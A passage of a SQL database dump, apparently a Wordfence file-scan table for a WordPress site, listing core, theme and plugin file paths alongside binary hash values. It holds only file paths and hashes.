���.�Õ�81�','wp-includes/random_compat/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nM@<��A6�@!�Y��','.#�$.N�.��\\\"�Cuj�%H��EJֈ^a','',0,'?'),('t���R��OLZ����\'','wp-includes/blocks/query/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��zDy�2>r`�U��','x)����QĠ]�e���+�}�r#�@����','',0,'?'),('t�7�p�G�:-G&�','wp-includes/blocks/tag-cloud/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���jl����kPS�','��\"�Ǣ�@�\n�py4&�7�:�wO�h4j�y�D�','',0,'?'),('t����|ܼ�Ŗ�f�;o','wp-content/themes/newsmagbd/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\l��J��_?��rҐ?','���$�Yᑯ��O��Yfv��\"�̏���i��','',0,'?'),('t��\0a��\\��_\'W�','wp-includes/blocks/table/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۰&R1W6zz�X��','/���������jʆ�jA��<9?ނ)�w2h�','',0,'?'),('u�6��4E~�:��','wp-content/plugins/wordfence/images/icons/working-indicator.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����VF���{N	�\'G','�fX��RZ�|:O�b��=f�[y���5 ~	','',0,'?'),('u)�!̧�X�����','wp-content/plugins/wp-cerber/languages/wp-cerber-fr_CA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��(�;	�5t�/','6�6s#Sx�_�	f���rC���6���w�9�','',0,'?'),('u!��+��\Z����','wp-includes/SimplePie/Cache/Redis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o.*h�`|,{���mg','�Yj�q��O�L����1����v��|�b�}|U','',0,'?'),('u)z�Z��hL�P�|�','wp-includes/blocks/spacer/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z#Ů�{��N���p','z���UԣYKu@W#��+�0��N�`qX��\"L	','',0,'?'),('u>]\0aO<�G:�5�Z�','wp-includes/blocks/latest-posts/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�v��υ�<����',':�6�8�Mr��\\�f����\ZSLMQ_�tّ�nz�','',0,'?'),('ue�,\"\n	�h�g.','wp-admin/css/colors/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X`��oi�`Hx���C','���d�pe܊&��΁�����������s-�','',0,'?'),('u����[������D','wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#g�x��@�o�TM�','���ee�6s���-�-I�$�Q�¼@ٍy��','',0,'?'),('u��3!pA�f�)R�M�','wp-includes/js/tinymce/plugins/wpgallery/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�vQ8_�$�?��','<��A0�6kJX\nvA/��%O�-v_���\'p�A@ئ','',0,'?'),('u�m-O��\'ߝ�]�#','wp-includes/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HDf��ae���z��R','㶜\\��L>L�N-@G\'��tmG��i��kR߮g\0','',0,'?'),('u��k6��O�>�&�W','wp-includes/blocks/text-columns/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c^�*��w��G㐾Q�','�+\\���1{*C�G+����J���Lv','',0,'?'),('u�qg\Z\0�8�hԭ�\0�','wp-admin/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y����&�','�Θ�4��C�w@�Xdo��N=w���<~o�','',0,'?'),('u�:�z�2�DQ��4','wp-includes/blocks/tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@{�\Z9ڛ���S6��1','��1�ʪ���V�IT/���m�w/(\'��t�+�','',0,'?'),('u���\'M���2�','wp-includes/blocks/embed/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gS2t�Պ���L�g^�',';@�s�rm��wp��ey�k%�Z��(��','',0,'?'),('vڴ����V���K��P','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PNڡ\'f���','\r]�~[�������_˳�P�B�TA`��*,O','',0,'?'),('v�)F��~q���?b','wp-admin/includes/class-plugin-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZE)�-0�M�;���h','2ꦢ�3l\'k��c�{�=ߺ��$[��&Of��','',0,'?'),('v&5�jr�jL #�ܲ�','wp-includes/blocks/categories/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]UpʛV���L�\n','�`op���V�/2�ˍ�(NW\Z�N�\'K�5','',0,'?'),('vK;@�s�aU1;�	^�','wp-config.php',0,'&E��!�^k�ɇ�h~','&E��!�^k�ɇ�h~','��6�6�x]�ޝ���m�t�d[��AJX���','',0,'?'),('vLM�.f���%OMR','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�V+=?k�\r���','_����x:�nOsO�:d�\'\0�N=���k�','',0,'?'),('vM�m*&Z�`\'/b�+','wp-includes/js/jquery/ui/effect-puff.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CH��w�d���֞','s� LMÖ�,sK���\Z~Q#�.0W�N׳_~','',0,'?'),('v_޸��k�c�3�a','wp-content/plugins/redirection/matches/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ծ|�.��&�##�','!7�mħ�}�?%A*�;7�\0������k���','',0,'?'),('ve׶\\�l.�х{','wp-includes/js/dist/vendor/wp-polyfill-formdata.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��ĬgI&Lɜ�Nn65','�:q-���a,/ϝ��ZSKJ�,T���a�5','',0,'?'),('vi�fuP�0^�>d��','wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��SG��˺��F���','[�(��R�������$��2o���t�b��','',0,'?'),('vw��@�H��z�F�','wp-admin/ms-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UjA�ڦYq�u��	','���\"G\n��ڔ���Mh�Q�2��l�\'�ܵ�','',0,'?'),('v]�z������3�tB','wp-admin/includes/class-wp-importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5V9��s�^z�P�F','i��x;B4��?d������esq��F�>��','',0,'?'),('v���J\n�E�Y3��0','wp-content/plugins/wordfence/modules/login-security/js/login.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T��8)H]ߖ=/','$�C�P�H\\EaB��w�І̱��Bٮ�,�^��','',0,'?'),('v��ޣ�R�','wp-includes/js/jquery/jquery-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�6��?ٳ��t�\r','t��&�hp�z���wĝ�&��Ś9&�7����v','',0,'?'),('vâ,\\�+Q�����֧','wp-admin/css/l10n-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OS�GfK罚�8��]','�d�x���k3r��ްVNĪ�e��t��-�����','',0,'?'),('v�.�#P�����H2��','wp-includes/blocks/buttons/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D���*�8I��yMW','��0�5d�|��*�TH8���혠x�Q�8�R�','',0,'?'),('v��q?\0�{��=�ŭe','wp-includes/blocks/site-logo/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���6;��9�ޝ<��{','I\Z�5��x�J�?��6����jO�Khx[E%_','',0,'?'),('v�G�.�g�A��#�r�','wp-admin/images/align-right-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�l�>r�]�lW��x','�V:�h���#ȆBT�5i\0�?��c�Bc���','',0,'?'),('v���4�|>�<����','wp-admin/js/xfn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wcW��_~\r�1��>p','4�[����Ÿ$[�\\��Ə�4�-3���z��x�','',0,'?'),('v�{#��l��b\0}��B','wp-admin/css/colors/light/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(Y?���mE�1��?','Q�����^ʕS���S�b;���?`w��','',0,'?'),('v�Ҹ);�D��~J\"�q','wp-includes/js/jquery/jquery.form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O����f������N',':�U��a�8��\ZP�����I��	���j�','',0,'?'),('w��S$jzd16�I3�y','wp-content/plugins/wordfence/js/jquery.qrcode.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('wu�l|��p��Q','wp-includes/js/autosave.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D��U\r���k��','eC�RO�0.�G�k=\\���N��Bb6�O{�','',0,'?'),('wDI��-E��I�l�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��%�a;B3>|CX��','B;,�y��_�:�$������E5��B0��\0','',0,'?'),('wDZ/�I�E�20y	ק','wp-content/plugins/wp-cerber/assets/flags/pf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S����\'�>�Gx��:�',' �5�C����}Z��;�T��q,H-�˻�','',0,'?'),('wZ��kFD9�����h','wp-includes/blocks/site-tagline/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����	��B�mqӮ','��a;���$�Z���u}+Z5����@A�\r','',0,'?'),('we��j�Z�q�I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�,�����Eڎ�;','5+�S�sY>%�r9�7�5[I�=�`<2M��','',0,'?'),('w~c�9G]N�aF��\0�','wp-content/plugins/redirection/locale/json/redirection-ja.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��&-z�|��C','�JIcV�%o�^S��Q�W������/�~�','',0,'?'),('w���L��0���]r.','wp-includes/images/crystal/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�1�����1�9',';�67����\r�!����x\Z_@H��&C��-��','',0,'?'),('w�@�I�e��R�f�7��','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h�R���','���=�mH��/�\ne��C��3�u58�','',0,'?'),('w��`M��>�{���','wp-admin/includes/noop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�qj����\Z!�\r:�','dˎJ��������P[\n=��Qc����P�','',0,'?'),('w�S����@��U��','wp-content/plugins/redirection/locale/redirection-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͻ\n懦.YU_��cӀ�','\'\nX��oXJ�g���i	�I<\\\nK��R�F��\0�','',0,'?'),('wË���9/,+1��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�� �Z8�t\"','avxu��흶j��=�I�S��D{����!','',0,'?'),('w������:}V��P','wp-admin/js/common.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<5�F%����.\r��','\0:�[��4��\ZM�hoC�b׸��us՟S�','',0,'?'),('x	G!N�$�.�d�Tb�','wp-includes/ID3/module.audio-video.flv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�����w�I�@��',';hg�D�)\r�:n���e8c������\"�.�','',0,'?'),('xF!��e������W�','wp-content/plugins/redirection/models/regex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_EѬf�+��]fkW ','��1٦-}„��ҪμFI���9���\\<G���','',0,'?'),('x9@^6��ߑ��o��','wp-includes/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('xIH�.�9�Y��BO','wp-admin/css/colors/coffee/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!QD�h�4�����','���O��eV‹T`N6bqIO7�M\n���^�8','',0,'?'),('xLKx ��2��Is�!#Q','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�U������CB\"','��)M���쩂tU��δ�Ԫ���F.�','',0,'?'),('xV�M��>�n�{O�ǟ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I,0�`�-=�OxH��','Ⰱm�Wka���2��Sj�>����\"�w�<','',0,'?'),('xe�˅�诹<��/eY','wp-includes/blocks/tag-cloud/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ao�U�u�g��T�;�4','�V���s��|����bPo�25�*�S�椞6�','',0,'?'),('xy�!��q�)�.ˉ\"','wp-content/plugins/wordfence/images/sort_desc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m����͟��r�� 9',';	�_�Y���t�7K��s��mC��\r����o','',0,'?'),('x�^m�]̲�/��L4vU','wp-admin/includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�є:�$\rন�)�','�v�Ӏ��r�D:9��3�9mU���mh:�lV','',0,'?'),('x��\\��\0v�`�%�]�','wp-content/plugins/redirection/fileio/apache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*G8��0��/�}��','�ٰ#�2�ꔜ(�Gr�o*�h_VlU�XM','',0,'?'),('x�.���X��J$�ɮܹ','wp-includes/blocks/pullquote/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c���\0��}̘8���*','��b��(����0�V�����\n��k��lY���','',0,'?'),('x덂��@}Y��i�+','wp-includes/js/tinymce/plugins/tabfocus/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ώ�@�/@M�m�N�','�xM��\'Ȥ��=�ڷ�?$�S,Fy���֥','',0,'?'),('x�z#�]�r�u?0��O�','wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���g`ɸ:ڕ^','���F/Q�H\0���^l 0�BΓի6S@Ph�','',0,'?'),('y���1��-�/fIנ','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��09\r�ɘa�d���P','F*O�Оq^�l��gz���,I?�b�R�]K�ֳE','',0,'?'),('y&E�zݜ�Z�y׺ڲ','wp-includes/class-wp-recovery-mode-key-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9A��l���%<�C','����{�Tg�}�E��^�[�Fe�.�','',0,'?'),('y52�m�\0�l�\"�e','wp-includes/js/dist/priority-queue.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R��\Z��Z��F��3\0','��Xio���=�c�-���qL��~�r�d�0','',0,'?'),('yA��0���Xz(��\'\\','wp-admin/js/widgets/media-gallery-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#D�\"5.�(���5��','Pe�Z\nG=�<����B3��\n\r٘�<��ׅ��','',0,'?'),('yO�\0yj�eB\nVp��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��ƀk�vk��\r','���iiLM�P���4�ިO_!���iN	�','',0,'?'),('y��\n�,\nC�|[i','wp-includes/customize/class-wp-customize-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��`�`b�=E�\"','䖌B�%�\'�M�9F���4\n��4yө�\n','',0,'?'),('y��{�\\b�a\'�\\','wp-includes/customize/class-wp-sidebar-block-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]m��L-D���+Zٕ','�o,bL�nB��Qv�-|q�d���\'B=�X&','',0,'?'),('y���E�a��:�[\0','wp-includes/class.wp-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�n��}%�3t�','���B-�[i<��6J�Zu*3��Q�q�xL\0','',0,'?'),('y�&�eW�K6�]��H�','wp-content/plugins/wp-cerber/assets/flags/br.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ն=Xo�#','�l�YC��#�fݽ�\Z\'4��	fk>�χO��}','',0,'?'),('y���1�L��gt�� ','wp-content/themes/newsmagbd/inc/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�x���i0\0_!����','s�\Z�_:\Z4:%`��0�D\Z}���Ur���','',0,'?'),('y�3���2/��[X#��F','wp-includes/blocks/query-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���zӫ��Z��$R�','����`�M�_�]�D�bf{›�Bhn��','',0,'?'),('y���G�\\`��MR�','wp-admin/network/site-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~Z�v릵��\'��','T�1�*nN�\Z�\r�?�ZU��a:��ܺr���','',0,'?'),('y���\0Lz�㶵�و','wp-includes/blocks/group/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��օ�5ރ��|�q�','۞\Z���}=eJ]�0]��uCG�.�0NA�\Z','',0,'?'),('y�\"�jY\0u���<c','wp-content/plugins/wp-cerber/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t*�(g���H8泤','a�f��J����i#� ���v�桃1b��Y','',0,'?'),('z\rR2nLS�k��','wp-content/plugins/redirection/api/api-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J:	K�N�\n���','�2�4�Qg�����8g����p�Ɏ','',0,'?'),('zx�\rQx��Fޅ��2','wp-content/plugins/wordfence/css/wf-colorbox.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!��N8�j��','o�t0�\r�P2��N�����i���K��u���','',0,'?'),('zɐ���@�/�/@�','wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�58O�O�}��s','����$9�dS>;�:���\n��ad_�X��[F','',0,'?'),('z.[�D8�R�','wp-includes/js/codemirror/jsonlint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)fy��kT�+��<՟','�$D;;����0���F�~p��GғF�ˁ��','',0,'?'),('z;j2WD�6��[�V','wp-admin/js/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' -)���@O(���b�','��1�iLOU�m\r[X���00�\\�E�B���-','',0,'?'),('z@���z�[P�ѐ�','wp-content/plugins/wp-cerber/assets/flags/rw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Ľ�C��6���ޯ�L�','y\n<P�^5z��g�\\\"�f\\�S�p8��1s','',0,'?'),('z]��Őx�\'!*[,��','wp-content/plugins/wp-cerber/assets/flags/ar.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���IauKc� ���io1','R�2�$��͗�[��G`�d�;TC\0ԙ���U','',0,'?'),('zn^\0�k�ܦ{�&��','wp-content/plugins/wp-cerber/languages/wp-cerber-nb_NO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P�����\"c�\\','v�+��>���v!�ɐ��O�pm�i','',0,'?'),('zo��ܲ�~��b','wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�5��uNi��!�z','����#���ɛ!w�c�w�؃}6���~A���','',0,'?'),('zt�S}�.���b��kg�','wp-content/plugins/redirection/locale/redirection-el.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r(xD�� \n�\0a���','���LG,$f~���(P~wj�9�ա(����','',0,'?'),('z|�����L��F�D�','wp-includes/css/dist/edit-widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��W�ؾ�$�����','�ػ�\'��z.��8	�u	�&�O���ݠ\0�1��','',0,'?'),('z��sDF��wPþ,�','wp-content/plugins/redirection/locale/redirection-ja.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�Th�I<3��0U�','��Jh�\"Z��#Q,�a��.����\0�Y','',0,'?'),('z�m�SA�}I���)','wp-includes/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i�k�/��j\rn�3','1�\'����ջ.�O��}5�Afi�~��>�:}s','',0,'?'),('z�2]�w\'��=\"�-�4','wp-includes/blocks/query-pagination-previous/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>*��ģ�x� #�','\\����𝌳䡠R�֜�t��c5\r�^���DaR','',0,'?'),('z�5�*\ZADZCk��j��','wp-content/plugins/wordfence/images/icons/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uO�{:qcV��\'','� at��v��dQ��0(�Ij�Ɩ�O��$e(*','',0,'?'),('z���L��5	g5�Ď�','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�r�I���bw\'-7�','�u�S�{��<���n\r߅+-#�;�᷃QЮ','',0,'?'),('z����8 L�{��q','wp-content/plugins/wordfence/lib/menu_scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/صtb�a���0�\'2','J��*e*��0��qCs\'GO.~r�1�OmS��4','',0,'?'),('z��Q<��\'��U~�R\\','wp-includes/css/wp-embed-template.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n��t�{�hK�','/�O��h\nσ��G�����E]<<�u���bh2','',0,'?'),('z����JX�w{!\rF���','wp-admin/includes/class-wp-upgrader-skins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\"������ґ�-щ','.��7j3?̶��·?��2U�E�.�G�W','',0,'?'),('z΋ۗ�`�瀃��1\0','wp-includes/js/jquery/ui/effect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�Bs*C���x�','|�Bh��z��+�{nց.n�s�E\\I��\0���','',0,'?'),('z�W�sW5ʈ� )��','wp-includes/css/dist/customize-widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r��Oy`33ɿ_�','��g,4h�uq������ZO��ذ�O��\Z�c','',0,'?'),('z������W�z�','wp-content/plugins/wp-cerber/languages/wp-cerber-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`)�2������Ͷ��',',$7���;����][���dHl@�B0�7�o','',0,'?'),('{\n���R�o��R=\'g�','wp-admin/js/widgets/custom-html-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��P�N��P�','H+T9���h�m�)L���(��u�Z^dH�','',0,'?'),('{��=2���?l�����','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pg���!��/�՝','�,	X6�!צ6�H�%�=98�`�y��nj�-','',0,'?'),('{N���2�Q�u��=	�','wp-admin/network/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��b~�@�u�ˏJ��','��\Z��dc\\fu�5���=q�אEc���I�a�','',0,'?'),('{=ا�{��\no}]v�','wp-content/plugins/wp-cerber/assets/flags/sa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]pڌE�YYz�ٶ','�����0��{A�3�HX�~��z��\nT�','',0,'?'),('{[�/����ڑ��','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܎�h�����(v1�','�\Z�le�knj\'=��|C���,\0��MlDG����','',0,'?'),('{]	Ǥ�DT���;H��','wp-content/themes/newsmagbd/inc/customizer/core/default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;5�{ID�',']��a�e�ot���\0�P�.T�*�s/2]R�','',0,'?'),('{a�{4�;��Moز','wp-includes/block-template-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wά�d��٬\r���','�n-j��\\zzT��89�fKo.q9�Xw�\0�Z�','',0,'?'),('{o��/�o�h9�a��','wp-content/plugins/wp-cerber/assets/flags/ve.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g���^ٔwX�c�','Z��\\[.�M���q��2]l�AL��Jf���C','',0,'?'),('{p!1��Z]KMC�*!','wp-content/plugins/redirection/locale/redirection-es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�BA�AM�3nN���',']����Zz�R�Q�u����\r���Z�p}�x�','',0,'?'),('{t�E~��P�A�1��','wp-admin/js/tags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>.Sc~\r\r��!s��(#�','T��*/�2�i3�j��p%�\0��n�x[5\'��','',0,'?'),('{y\"�ҵ��ݩ�{���','wp-admin/includes/class-walker-category-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǯ ��f/,d%eU�','�Q��;����\Z�4o_�{����\nϠ�q\"Q�r','',0,'?'),('{�j�ɏ|n�	^<�WH�','wp-includes/css/dist/nux/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۗ�0؀a��==ڈ','����R�~��?�t���Ot(4��������	','',0,'?'),('{�)�4e4p:�fW�','wp-includes/js/jquery/jquery.query.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�Xz�ǰ��wC','�u�g^���+��i��m���G\rF�x�i�X�','',0,'?'),('{�1�9�+sh���','wp-content/plugins/wp-cerber/assets/flags/gp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CG_t?���9�rK','��hd0)m�3�a�ͱQ�D�V�����}�','',0,'?'),('{��\n�rI���','wp-admin/widgets-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�Cu�/����E','�ˎ��<!̋	j���]]���i	�6�','',0,'?'),('{�RC��\Z�.*\"�Q','wp-includes/feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Y�G�~\"7W\r��Uz','*~(Y�n+s2���`�x�2TȾ)@��L���','',0,'?'),('{�\r�-��}�^��','wp-includes/images/smilies/frownie.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���������','r�~�Dzo�h߱�����ػ\">E�+�Ke�','',0,'?'),('{���?���\r��\n\'','wp-admin/images/imgedit-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\\2���}�G�i;O','T�N�~��-�@��N��̞V�\\��(u$��','',0,'?'),('|j��x7�(Q}�0�\'�','wp-admin/css/list-tables.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2;��z�)ca��yH','>����|�5HZ/C�~�!H�(߲��>�','',0,'?'),('|���L��F8�5<ZM','wp-includes/blocks/gallery/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؼ������K1]X�','16�%D�FI�[&i�1���f֦F��i��6��','',0,'?'),('|-����z��-�','wp-admin/export-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xh�v�iy��.��','C~S����|��8R�wK@�_�J��m�','',0,'?'),('|/ڒ�\0[*4��x��','wp-includes/js/admin-bar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�c����@p�','t���bIld�\n�Lb�x+�ϔ�j䶪,�J\0\r$2','',0,'?'),('|4,��\r\"ɱ�؊��o','wp-content/plugins/redirection/api/api-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�=t���DJ�Jk�)�','���?ʷ��f1�l!\\tU-ҭ-��+�ε','',0,'?'),('|N!�;x�N&�g��m�','wp-admin/js/widgets/media-image-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G9�Fm�qQ��','J�6�%V��\"�\rK�yɳ�h���8�N�����F','',0,'?'),('|l�+F��#ڟ�����','wp-includes/class-wp-user-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�?�v��\\����$','z����.t(���C�o���	